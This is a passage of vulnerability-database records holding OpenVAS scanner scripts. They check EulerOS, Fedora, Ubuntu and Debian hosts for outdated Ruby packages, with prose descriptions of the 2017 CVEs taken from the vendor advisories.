\"CVE-2017-14064\", \"CVE-2017-17405\", \"CVE-2017-17790\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:11:28 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:11:28 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ruby (EulerOS-SA-2018-1067)\");\n script_category(ACT_GATHER_INFO);\n 
script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2018-1067\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1067\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ruby' package(s) announced via the EulerOS-SA-2018-1067 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that the Net::FTP module did not properly process filenames in combination with certain operations. A remote attacker could exploit this flaw to execute arbitrary commands by setting up a malicious FTP server and tricking a user or Ruby application into downloading files with specially crafted names using the Net::FTP module. (CVE-2017-17405)\n\nA buffer underflow was found in ruby's sprintf function. An attacker, with ability to control its format string parameter, could send a specially crafted string that would disclose heap memory or crash the interpreter. (CVE-2017-0898)\n\nIt was found that rubygems did not sanitize gem names during installation of a given gem. A specially crafted gem could use this flaw to install files outside of the regular directory. (CVE-2017-0901)\n\nA vulnerability was found where rubygems did not sanitize DNS responses when requesting the hostname of the rubygems server for a domain, via a _rubygems._tcp DNS SRV query. An attacker with the ability to manipulate DNS responses could direct the gem command towards a different domain. 
(CVE-2017-0902)\n\nA vulnerability was found where the rubygems module was vulnerable to an unsafe YAML deserialization when inspecting a gem. Applications inspecting gem files without installing them can be tricked to execute arbitrary code in the context of the ruby interpreter. (CVE-2017-0903)\n\nIt was found that WEBrick did not sanitize all its log messages. If logs were printed in a terminal, an attacker could interact with the terminal via the use of escape sequences. (CVE-2017-10784)\n\nIt was found that the decode method of the OpenSSL::ASN1 module was vulnerable to buffer underrun. An attacker could pass a specially crafted string to the application in order to crash the ruby interpreter, causing a denial of service. (CVE-2017-14033)\n\nA vulnerability was found where rubygems did not properly sanitize gems' specification text. A specially crafted gem could interact with the terminal via the use of escape sequences. (CVE-2017-0899)\n\nIt was found that rubygems could use an excessive amount of CPU while parsing a sufficiently long gem summary. A specially crafted gem from a gem repository could freeze gem commands attempting to parse its summary. (CVE-2017-0900)\n\nA buffer overflow vulnerability was found in the JSON extension of ruby. An attacker with the ability to pass a specially crafted JSON input to the extension could use this flaw to expose the interpreter's heap memory. 
(CVE-2017-14064)\");\n\n script_tag(name:\"affected\", value:\"'ruby' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~2.0.0.648~33.h2\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-irb\", rpm:\"ruby-irb~2.0.0.648~33.h2\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~2.0.0.648~33.h2\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:37:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-17405", "CVE-2017-0903", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-0902", "CVE-2017-14033", "CVE-2017-17790", "CVE-2017-14064", "CVE-2017-0901"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191407", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191407", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ruby (EulerOS-SA-2019-1407)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free 
software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1407\");\n script_version(\"2020-01-23T11:42:38+0000\");\n script_cve_id(\"CVE-2017-0898\", \"CVE-2017-0899\", \"CVE-2017-0900\", \"CVE-2017-0901\", \"CVE-2017-0902\", \"CVE-2017-0903\", \"CVE-2017-10784\", \"CVE-2017-14033\", \"CVE-2017-14064\", \"CVE-2017-17405\", \"CVE-2017-17790\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:42:38 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:42:38 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ruby (EulerOS-SA-2019-1407)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRTARM64-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1407\");\n script_xref(name:\"URL\", 
value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1407\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ruby' package(s) announced via the EulerOS-SA-2019-1407 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that the Net::FTP module did not properly process filenames in combination with certain operations. A remote attacker could exploit this flaw to execute arbitrary commands by setting up a malicious FTP server and tricking a user or Ruby application into downloading files with specially crafted names using the Net::FTP module.(CVE-2017-17405)\n\nThe 'lazy_initialize' function in lib/resolv.rb did not properly process certain filenames. A remote attacker could possibly exploit this flaw to inject and execute arbitrary commands.(CVE-2017-17790)\n\nIt was found that rubygems could use an excessive amount of CPU while parsing a sufficiently long gem summary. A specially crafted gem from a gem repository could freeze gem commands attempting to parse its summary.(CVE-2017-0900)\n\nIt was found that rubygems did not sanitize gem names during installation of a given gem. A specially crafted gem could use this flaw to install files outside of the regular directory.(CVE-2017-0901)\n\nA vulnerability was found where rubygems did not sanitize DNS responses when requesting the hostname of the rubygems server for a domain, via a _rubygems._tcp DNS SRV query. An attacker with the ability to manipulate DNS responses could direct the gem command towards a different domain.(CVE-2017-0902)\n\nA vulnerability was found where rubygems did not properly sanitize gems' specification text. 
A specially crafted gem could interact with the terminal via the use of escape sequences.(CVE-2017-0899)\n\nA buffer overflow vulnerability was found in the JSON extension of ruby. An attacker with the ability to pass a specially crafted JSON input to the extension could use this flaw to expose the interpreter's heap memory.(CVE-2017-14064)\n\nIt was found that WEBrick did not sanitize all its log messages. If logs were printed in a terminal, an attacker could interact with the terminal via the use of escape sequences.(CVE-2017-10784)\n\nIt was found that the decode method of the OpenSSL::ASN1 module was vulnerable to buffer underrun. An attacker could pass a specially crafted string to the application in order to crash the ruby interpreter, causing a denial of service.(CVE-2017-14033)\n\nA buffer underflow was found in ruby's sprintf function. An attacker, with ability to control its format string parameter, could send a specially crafted string that would disclose heap memory or crash the interpreter.(CVE-2017-0898)\n\nA vulnerability was found where the rubygems module was vulnerable to an unsafe YAML deserialization when inspecting a gem. 
Applications inspecting gem files without installing them can be tricked to execute arbitrary code in the context of the ruby interpreter.(CVE-2017-0903)\");\n\n script_tag(name:\"affected\", value:\"'ruby' package(s) on Huawei EulerOS Virtualization for ARM 64 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRTARM64-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~2.0.0.648~33.h11\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-irb\", rpm:\"ruby-irb~2.0.0.648~33.h11\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~2.0.0.648~33.h11\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-bigdecimal\", rpm:\"rubygem-bigdecimal~1.2.0~33.h11\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-io-console\", rpm:\"rubygem-io-console~0.4.2~33.h11\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-json\", rpm:\"rubygem-json~1.7.7~33.h11\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-psych\", rpm:\"rubygem-psych~2.0.0~33.h11\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-rdoc\", rpm:\"rubygem-rdoc~4.0.0~33.h11\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygems\", rpm:\"rubygems~2.0.14.1~33.h11\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) 
{\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0898", "CVE-2017-10784", "CVE-2017-14033"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-12-29T00:00:00", "id": "OPENVAS:1361412562310873953", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873953", "type": "openvas", "title": "Fedora Update for ruby FEDORA-2017-6e6f4f95e6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_6e6f4f95e6_ruby_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for ruby FEDORA-2017-6e6f4f95e6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873953\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-29 08:05:08 +0100 (Fri, 29 Dec 2017)\");\n script_cve_id(\"CVE-2017-14033\", \"CVE-2017-10784\", \"CVE-2017-0898\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for ruby FEDORA-2017-6e6f4f95e6\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ruby'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"ruby on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-6e6f4f95e6\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X3U6T42QITZNKC5KGDDMYAR4OS4TWYJ2\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~2.4.2~84.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0900", "CVE-2017-0899", "CVE-2017-0902", "CVE-2017-14064", "CVE-2017-0901"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-09-16T00:00:00", "id": "OPENVAS:1361412562310873376", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873376", "type": "openvas", "title": "Fedora Update for ruby FEDORA-2017-e136d63c99", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_e136d63c99_ruby_fc25.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for ruby FEDORA-2017-e136d63c99\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873376\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-09-16 07:45:07 +0200 (Sat, 16 Sep 2017)\");\n script_cve_id(\"CVE-2017-0899\", \"CVE-2017-0900\", \"CVE-2017-0901\", \"CVE-2017-0902\",\n \"CVE-2017-14064\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for ruby FEDORA-2017-e136d63c99\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ruby'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"ruby on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-e136d63c99\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UFJE2REXNRTPGIHSNPRSAWTVCLFMRJZT\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", 
re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~2.3.4~64.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-10784", "CVE-2017-14033", "CVE-2017-17790", "CVE-2017-14064"], "description": "The remote host is missing an update for the ", "modified": "2019-03-18T00:00:00", "published": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310843684", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843684", "type": "openvas", "title": "Ubuntu Update for ruby2.3 USN-3528-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3528_1.nasl 14288 2019-03-18 16:34:17Z cfischer $\n#\n# Ubuntu Update for ruby2.3 USN-3528-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843684\");\n script_version(\"$Revision: 14288 $\");\n script_cve_id(\"CVE-2017-10784\", \"CVE-2017-14033\", \"CVE-2017-14064\", \"CVE-2017-17790\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 17:34:17 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-10-26 06:06:44 +0200 (Fri, 26 Oct 2018)\");\n script_name(\"Ubuntu Update for ruby2.3 USN-3528-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|17\\.10|16\\.04 LTS)\");\n\n script_xref(name:\"USN\", value:\"3528-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3528-1/\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ruby2.3'\n package(s) announced via the USN-3528-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that Ruby incorrectly handled certain terminal\nemulator escape sequences. An attacker could use this to execute\narbitrary code via a crafted user name. This issue only affected Ubuntu\n16.04 LTS and Ubuntu 17.10. 
(CVE-2017-10784)\n\nIt was discovered that Ruby incorrectly handled certain strings.\nAn attacker could use this to cause a denial of service. This issue\nonly affected Ubuntu 16.04 LTS and Ubuntu 17.10. (CVE-2017-14033)\n\nIt was discovered that Ruby incorrectly handled some generating JSON.\nAn attacker could use this to possible expose sensitive information.\nThis issue only affected Ubuntu 16.04 LTS and Ubuntu 17.10.\n(CVE-2017-14064)\n\nIt was discovered that Ruby incorrectly handled certain inputs.\nAn attacker could use this to execute arbitrary code.\n(CVE-2017-17790)\");\n\n script_tag(name:\"affected\", value:\"ruby2.3 on Ubuntu 17.10,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libruby1.9.1\", ver:\"1.9.3.484-2ubuntu1.7\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ruby1.9.1\", ver:\"1.9.3.484-2ubuntu1.7\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ruby1.9.3\", ver:\"1.9.3.484-2ubuntu1.7\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU17.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libruby2.3\", ver:\"2.3.3-1ubuntu1.2\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ruby2.3\", ver:\"2.3.3-1ubuntu1.2\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n 
exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libruby2.3\", ver:\"2.3.1-2~16.04.5\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ruby2.3\", ver:\"2.3.1-2~16.04.5\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0898", "CVE-2017-0903", "CVE-2017-10784", "CVE-2017-14033"], "description": "Several vulnerabilities have been discovered in the interpreter for the\nRuby language. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2017-0898\naerodudrizzt reported a buffer underrun vulnerability in the sprintf\nmethod of the Kernel module resulting in heap memory corruption or\ninformation disclosure from the heap.\n\nCVE-2017-0903\nMax Justicz reported that RubyGems is prone to an unsafe object\ndeserialization vulnerability. When parsed by an application which\nprocesses gems, a specially crafted YAML formatted gem specification\ncan lead to remote code execution.\n\nCVE-2017-10784\nYusuke Endoh discovered an escape sequence injection vulnerability\nin the Basic authentication of WEBrick. 
An attacker can take\nadvantage of this flaw to inject malicious escape sequences to the\nWEBrick log and potentially execute control characters on the\nvictim", "modified": "2019-03-18T00:00:00", "published": "2017-11-11T00:00:00", "id": "OPENVAS:1361412562310704031", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704031", "type": "openvas", "title": "Debian Security Advisory DSA 4031-1 (ruby2.3 - security update)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: deb_4031.nasl 14284 2019-03-18 15:02:15Z cfischer $\n#\n# Auto-generated from advisory DSA 4031-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704031\");\n script_version(\"$Revision: 14284 $\");\n script_cve_id(\"CVE-2017-0898\", \"CVE-2017-0903\", \"CVE-2017-10784\", \"CVE-2017-14033\");\n script_name(\"Debian Security Advisory DSA 4031-1 (ruby2.3 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 16:02:15 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-11-11 00:00:00 +0100 (Sat, 11 Nov 2017)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2017/dsa-4031.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n script_tag(name:\"affected\", value:\"ruby2.3 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), these problems have been fixed in\nversion 2.3.3-1+deb9u2.\n\nWe recommend that you upgrade your ruby2.3 packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been discovered in the interpreter for the\nRuby language. 
